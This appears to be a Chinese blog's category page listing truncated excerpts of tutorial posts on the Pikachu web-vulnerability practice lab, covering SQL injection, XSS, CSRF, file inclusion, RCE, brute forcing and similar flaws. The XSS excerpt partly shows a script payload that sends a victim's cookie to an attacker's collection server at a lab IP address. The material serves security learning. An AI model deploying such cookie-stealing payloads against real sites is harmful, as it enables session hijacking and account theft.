随笔分类 -  Pikachu

摘要:sql注入漏洞 危害是最大得 sql注入类型: 数字型 user_id=$id 字符型 user_id='$id' 搜索型 text like '%{$_GET['search']}' " select 字段1 from table where id=1 会显示表中第一行信息 select 字段1 阅读全文
posted @ 2020-02-21 19:39 Res0lve 阅读(487) 评论(0) 推荐(0)
摘要:目录遍历漏洞概述 在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。 当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件。 在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过 阅读全文
posted @ 2020-02-16 17:59 Res0lve 阅读(1094) 评论(0) 推荐(0)
摘要:PHP反序列化 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题 常见的几个魔法函数: __construct()当一 阅读全文
posted @ 2020-02-15 22:13 Res0lve 阅读(411) 评论(0) 推荐(0)
摘要:URL重定向 不安全的url跳转不安全的url跳转问题可能发生在一切执行了url地址跳转的地方。如果后端采用了前端传进来的(可能是用户传参,或者之前预埋在前端页面的url地址)参数作为了跳转的目的地,而又没有做判断的话就可能发生"跳错对象"的问题。url跳转比较直接的危害是:-->钓鱼,既攻击者使用 阅读全文
posted @ 2020-02-15 21:53 Res0lve 阅读(239) 评论(0) 推荐(0)
摘要:越权 如果使用A用户的权限去操作B用户的数据,A的权限小于B的权限,如果能够成功操作,则称之为越权操作。 比如普通用户修改去完成高权限(超级管理员)账号范围内的操作 越权漏洞形成的原因是后台使用了 不合理的权限校验规则导致的。 一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方, 阅读全文
posted @ 2020-02-15 21:43 Res0lve 阅读(214) 评论(0) 推荐(0)
摘要:0x00 不安全的文件上传漏洞概述不安全的文件上传漏洞概述 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像、上传附件等等。当用户点击上传按钮后,后台会对上传的文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 比如上传头 阅读全文
posted @ 2020-02-14 23:28 Res0lve 阅读(532) 评论(0) 推荐(0)
摘要:Pikachu-Unsafe Filedownload 不安全的文件下载 文件下载功能在很多web系统上都会出现,一般我们当点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后 会开始执行下载代码,将该文件名对应的文件response给浏览器,从而完成 阅读全文
posted @ 2020-02-14 23:07 Res0lve 阅读(251) 评论(0) 推荐(0)
摘要:文件包含漏洞: File Inclusion 本地文件包含漏洞 远程文件包含漏洞 根据不同的配置环境,文件包含漏洞分为如下两种情况: 1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的, 因此该情况下,攻击着更多的会包含一些 固定的系统配置文件,从而读 阅读全文
posted @ 2020-02-14 22:23 Res0lve 阅读(475) 评论(0) 推荐(0)
摘要:RCE remote command/code execute 远程系统命令/ 代码执行 系统从设计上需要给用户提供指定的远程命令操作的接口。可以测试一下自动运维平台。 在PHP中,使用system、exec、shell_ exec、passthru、pcntl_exec、popen、proc_po 阅读全文
posted @ 2020-02-14 19:54 Res0lve 阅读(717) 评论(0) 推荐(0)
摘要:CSRF 在CSRF攻击场景中攻击者会伪造一个请求 (一个链接) 然后欺骗目标用户点击,用户一旦点击了这个请求,整个攻击也就完成了 所以CSRF攻击也被称为“one click“攻击 例子: 想要修改lucy购物地址信息 lucy必须处于登录的状态,lucy必须点击攻击链接 xss和csrf区别: 阅读全文
posted @ 2020-02-14 19:18 Res0lve 阅读(391) 评论(0) 推荐(0)
摘要:xss后台的安装 重定向到另一个可信网址 让点击者 不知情 1.cookie值获取 查看源代码 在反射型xss(get)页面下使用 <script> document.location = 'http://192.168.50.100/pkxss/xcookie/cookie.php?cookie= 阅读全文
posted @ 2020-02-12 17:24 Res0lve 阅读(3636) 评论(0) 推荐(0)
摘要:第一步链接数据库 修改配置文件,重置数据库~ 基于表单的暴力破解 进入暴力破解的子选项:基于表单的暴力破解。我们可以看到如下界面 我们随便输入信息然后设置代理用burp suite 进行拦截数据包。 发送到Intruer模块。 这里简单介绍一下Intruer模块。里面有四个选项卡,分别是: atta 阅读全文
posted @ 2020-02-11 17:27 Res0lve 阅读(1180) 评论(0) 推荐(0)